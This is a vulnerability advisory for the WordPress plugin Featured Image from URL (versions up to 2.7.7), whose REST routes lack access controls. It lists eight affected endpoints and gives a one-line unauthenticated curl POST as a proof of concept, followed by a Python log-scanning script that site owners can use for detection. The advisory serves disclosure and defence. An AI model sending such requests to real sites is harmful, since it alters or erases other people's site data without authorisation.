Featured Image from URL <= 2.7.7 - Missing Access Controls on REST routes



Description
The REST routes are missing permission callbacks, allowing unauthenticated/unauthorised users to call them.
Proof of Concept
Affected endpoints:
- wp-json/featured-image-from-url/v2/enable_fake_api
- wp-json/featured-image-from-url/v2/disable_fake_api
- wp-json/featured-image-from-url/v2/none_fake_api
- wp-json/featured-image-from-url/v2/data_clean_api
- wp-json/featured-image-from-url/v2/save_dimensions_all_api
- wp-json/featured-image-from-url/v2/clean_dimensions_all_api
- wp-json/featured-image-from-url/v2/disable_default_api
- wp-json/featured-image-from-url/v2/none_default_api


curl -X POST https://WP/wp-json/featured-image-from-url/v2/enable_fake_api
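
As an added example (not part of the original advisory or the plugin's code), here is a log check a site owner could run to see whether any of the endpoints listed above were requested. It assumes a web server access log in combined format and uses constructed sample lines; it also goes slightly beyond the advisory by covering WordPress's `?rest_route=` URL form, used when pretty permalinks are off.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

NAMESPACE = "/featured-image-from-url/v2/"
# Route names exactly as listed in the advisory.
AFFECTED = {
    "enable_fake_api", "disable_fake_api", "none_fake_api", "data_clean_api",
    "save_dimensions_all_api", "clean_dimensions_all_api",
    "disable_default_api", "none_default_api",
}
# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def rest_route(target):
    """Return the REST route of a request target (pretty or ?rest_route= form)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if "/wp-json/" in path:
        return "/" + path.split("/wp-json/", 1)[1]
    values = parse_qs(parts.query).get("rest_route")  # parse_qs percent-decodes
    return values[0] if values else None

def find_hits(lines):
    """Yield (ip, time, method, route_name, status) for the affected routes."""
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, when, method, target, status = m.groups()
        route = rest_route(target)
        if not route or not route.startswith(NAMESPACE):
            continue
        name = route[len(NAMESPACE):].strip("/")
        if name in AFFECTED:
            yield ip, when, method, name, int(status)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [24/Dec/2019:10:01:02 +0000] "POST /wp-json/featured-image-from-url/v2/enable_fake_api HTTP/1.1" 200 17 "-" "curl/7.66.0"',
    '203.0.113.7 - - [24/Dec/2019:10:01:09 +0000] "POST /?rest_route=%2Ffeatured-image-from-url%2Fv2%2Fdata_clean_api HTTP/1.1" 200 17 "-" "curl/7.66.0"',
    '198.51.100.4 - - [24/Dec/2019:10:02:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [24/Dec/2019:10:03:00 +0000] "POST /wp-json/featured-image-from-url/v2/other_api HTTP/1.1" 404 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE):
        print(*hit)
```

An access log does not record whether the caller was logged in, so each hit still has to be compared against known administrator activity. Hits on a site running 2.7.7 or earlier are the ones to review.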

Affects Plugin

Featured Image from URL: fixed in version 2.7.8

References

URL https://plugins.trac.wordpress.org/changeset?new=2217617%40featured-image-from-url&old=2216221%40featured-image-from-url

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Views 84284
Verified No
WPVDB ID 9981

Timeline

Publicly Published 2019-12-24 (30 days ago)
Added 2019-12-24 (29 days ago)
Last Updated 2019-12-24 (29 days ago)
